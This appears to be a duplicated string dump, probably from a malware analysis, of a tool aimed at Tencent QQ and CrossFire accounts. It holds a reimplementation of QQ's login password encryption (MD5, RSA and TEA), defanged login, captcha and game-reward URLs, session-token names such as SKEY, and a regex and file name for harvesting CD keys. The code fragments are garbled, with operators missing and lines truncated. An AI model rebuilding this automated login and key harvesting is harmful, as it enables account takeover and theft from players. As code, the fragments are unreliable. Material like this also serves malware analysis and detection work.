str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i
for (var i = 0; i
if (i * 8 j * 6 > binarray.length * 32) {
if (i * 8 j * 6 > binarray.length * 32) {
str = tab.charAt((triplet >> 6 * (3 - j)) & 63)
str = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i
for (var i = 0; i
arr.push('\\x' str.substr(i, 2))
arr.push('\\x' str.substr(i, 2))
arr = arr.join('');
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000' vcode.length.toString(16);
vcodeLen = '000' vcode.length.toString(16);
while (rsaH1Len.length
while (rsaH1Len.length
TEA.initkey(s2);
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);
var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);
TEA.initkey('');
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
'/': '-',
' ': '*',
' ': '*',
'=': '_'
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str1 = isMd5 ? password: md5(password);
var str2 = str1 vcode.toUpperCase();
var str2 = str1 vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
$.RSA = function() {
while (z aD
while (z aD
t = aC.substring(z, z aD) '\n';
t = aC.substring(z, z aD) '\n';
return t aC.substring(z, aC.length)
return t aC.substring(z, aC.length)
return '0' t.toString(16)
return '0' t.toString(16)
return t.toString(16)
return t.toString(16)
if (aG
if (aG
var aC = aD.length - 1;
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
z.nextBytes(t)
this.dmp1 = null;
this.dmp1 = null;
this.dmq1 = null;
this.dmq1 = null;
this.coeff = null
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength() 7) >> 3);
var t = ah(aC, (this.n.bitLength() 7) >> 3);
var aD = this.doPublic(t);
var aD = this.doPublic(t);
var z = aD.toString(16);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, 256)
this.fromString(z, t)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = b;
au.prototype.am = az;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DB = ay;
au.prototype.DM = ((1
au.prototype.DM = ((1
au.prototype.DV = (1
au.prototype.DV = (1
au.prototype.FV = Math.pow(2, ac);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
z.fromInt(t);
this.fromRadix(aG, z);
this.fromRadix(aG, z);
var aF = aG.length,
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aG.charAt(aF) == '-') {
if (aE aD > this.DB) {
if (aE aD > this.DB) {
this[this.t - 1] |= (t & ((1
this[this.t - 1] |= (t & ((1
this[this.t ] = (t >> (this.DB - aE))
this[this.t ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
if (aE >= this.DB) {
aE -= this.DB
aE -= this.DB
this[this.t - 1] |= ((1
this[this.t - 1] |= ((1
this.clamp();
this.clamp();
au.ZERO.subTo(this, this)
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
var t = this.s & this.DM;
return '-' this.negate().toString(z)
return '-' this.negate().toString(z)
return this.toRadix(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
var aG = this.DB - (aD * this.DB) % aC;
if (aG > aG) > 0) {
if (aG > aG) > 0) {
aH |= this[--aD] >> (aG = this.DB - aC)
aH |= this[--aD] >> (aG = this.DB - aC)
aG = this.DB; --aD
aG = this.DB; --aD
au.ZERO.subTo(this, t);
au.ZERO.subTo(this, t);
return (this.s
return (this.s
return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))
return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var z = aH % this.DB;
var t = this.DB - z;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
var aE = Math.floor(aH / this.DB),
aG = (this.s
aG = (this.s
aD.clamp()
aD.clamp()
var aE = Math.floor(aG / this.DB);
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
var z = aG % this.DB;
t = Math.min(z.t, this.t);
t = Math.min(z.t, this.t);
aD[aC ] = aE & this.DM;
aD[aC ] = aE & this.DM;
aE >>= this.DB
aE >>= this.DB
aD[aC ] = aE & this.DM;
aD[aC ] = aE & this.DM;
aE >>= this.DB
aE >>= this.DB
aD[aC ] = this.DV aE
aD[aC ] = this.DV aE
var t = this.abs(),
var t = this.abs(),
aE = z.abs();
aE = z.abs();
aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
aD.clamp();
au.ZERO.subTo(aD, aD)
au.ZERO.subTo(aD, aD)
var t = this.abs();
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {
if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {
aC[z t.t] -= t.DV;
aC[z t.t] -= t.DV;
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
aC.clamp()
var aQ = aK.abs();
var aQ = aK.abs();
var aI = this.abs();
var aI = this.abs();
aH.fromInt(0)
aH.fromInt(0)
this.copyTo(aG)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aQ.copyTo(aE);
aI.copyTo(aG)
aI.copyTo(aG)
var aT = this.FV / aL,
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))
aE.dlShiftTo(aN, aF);
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.clamp();
aG.rShiftTo(aP, aG)
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
this.abs().divRemTo(t, null, z);
if (this.s 0) {
if (this.s 0) {
t.subTo(z, z)
t.subTo(z, z)
if (t.s = 0) {
if (t.s = 0) {
return t.mod(this.m)
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
t.multiplyTo(aC, z);
this.reduce(z)
this.reduce(z)
t.squareTo(z);
t.squareTo(z);
M.prototype.convert = X;
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.mph = this.mp >> 15;
this.um = (1
this.um = (1
this.mt2 = 2 * t.t
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
z.divRemTo(this.m, null, z);
if (t.s 0) {
if (t.s 0) {
this.m.subTo(z, z)
this.m.subTo(z, z)
t.copyTo(z);
t.copyTo(z);
this.reduce(z);
this.reduce(z);
while (t.t
while (t.t
var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)
var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
while (t[z] >= t.DV) {
t[z] -= t.DV;
t[z] -= t.DV;
t.clamp();
t.clamp();
t.drShiftTo(this.m.t, t);
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
g.prototype.sqrTo = ao;
return au.ONE
return au.ONE
aF = aI.convert(this),
aF = aI.convert(this),
aF.copyTo(aG);
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
return aI.revert(aG)
if (aC
if (aC
return this.exp(aC, aD)
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ZERO = c(0);
au.ONE = c(1);
au.ONE = c(1);
d(new Date().getTime())
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion
if (navigator.appName == 'Netscape' && navigator.appVersion
var H = window.crypto.random(32);
var H = window.crypto.random(32);
for (K = 0; K
for (K = 0; K
W[ae ] = H.charCodeAt(K) & 255
W[ae ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
K = Math.floor(65536 * Math.random());
o.init(W);
o.init(W);
for (ae = 0; ae
for (ae = 0; ae
return o.next()
return o.next()
for (t = 0; t
for (t = 0; t
af.prototype.nextBytes = ax;
af.prototype.nextBytes = ax;
z = (z this.S[aD] aE[aD % aE.length]) & 255;
z = (z this.S[aD] aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.init = f;
m.prototype.next = a;
m.prototype.next = a;
t.setPublic(aC, z);
t.setPublic(aC, z);
return t.encrypt(aD)
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B
for (var B = 0; B
var C = Number(D[B]).toString(16);
var C = Number(D[B]).toString(16);
if (C.length == 1) {
if (C.length == 1) {
for (var A = 0; A
for (var A = 0; A
C = String.fromCharCode(parseInt(B.substr(A, 2), 16))
C = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A
for (var A = 0; A
B[A] = C.charCodeAt(A)
B[A] = C.charCodeAt(A)
var A = C.length;
var A = C.length;
var A = E.length;
var A = E.length;
for (var C = 0; C
for (var C = 0; C
var A = u.length;
var A = u.length;
for (var B = 0; B
for (var B = 0; B
C[B] = E.charCodeAt(B) & 255
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B
for (var B = 0; B
C[A ] = parseInt(E.substr(B, 2), 16)
C[A ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
s.TEA = {
for (var B = 0; B
for (var B = 0; B
A = String.fromCharCode(C[B])
A = String.fromCharCode(C[B])
return d.encode(A)
return d.encode(A)
initkey: function(A, B) {
initkey: function(A, B) {
d.PADCHAR = '=';
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
var A = C.charCodeAt(B);
d.encode = function(E) {
d.encode = function(E) {
if (arguments.length != 1) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var B = d.PADCHAR;
var G = d.ALPHA;
var G = d.ALPHA;
var F = d.getbyte;
var F = d.getbyte;
var C = E.length - E.length % 3;
var C = E.length - E.length % 3;
if (E.length == 0) {
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
A.push(G.charAt(H & 63))
switch (E.length - C) {
switch (E.length - C) {
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) B B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) B B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) G.charAt((H >> 6) & 63) B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) G.charAt((H >> 6) & 63) B);
return A.join('')
return A.join('')
if (!window.btoa) {
if (!window.btoa) {
window.btoa = d.encode
window.btoa = d.encode
var hex = str.toString(16);
var hex = str.toString(16);
var len = hex.length;
var len = hex.length;
arr.push('\\x' hex.substr(j, 2))
arr.push('\\x' hex.substr(j, 2))
var result = arr.join('');
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000' c.length.toString(16);
vcodeLen = '000' c.length.toString(16);
s.TEA.initkey(s2);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len rsaH1 s.TEA.strToBytes(salt) vcodeLen hexVcode);
var saltPwd = s.TEA.enAsBase64(rsaH1Len rsaH1 s.TEA.strToBytes(salt) vcodeLen hexVcode);
s.TEA.initkey('');
s.TEA.initkey('');
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
pt_mbkey
[SKEY]
[SKEY]
"cdkey":"(.*?)"
"cdkey":"(.*?)"
[%d/d/d d:d]
[%d/d/d d:d]
\CF_CDKEY.ini
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
%7C
&user_checkparam=cf%7Cyes%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
"msg":"
sMsg":"
sMsg":"
sMsg":"MODULE OK"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
&posttime=
&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=å…Â费枪&vip=0&bangdou=1
&searchkey=15051408311873756101000000000000&from=1&question=å…Â费枪&vip=0&bangdou=1
%7C322%7C
%7C322%7C
*&checkparam=cf%7Cyes%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
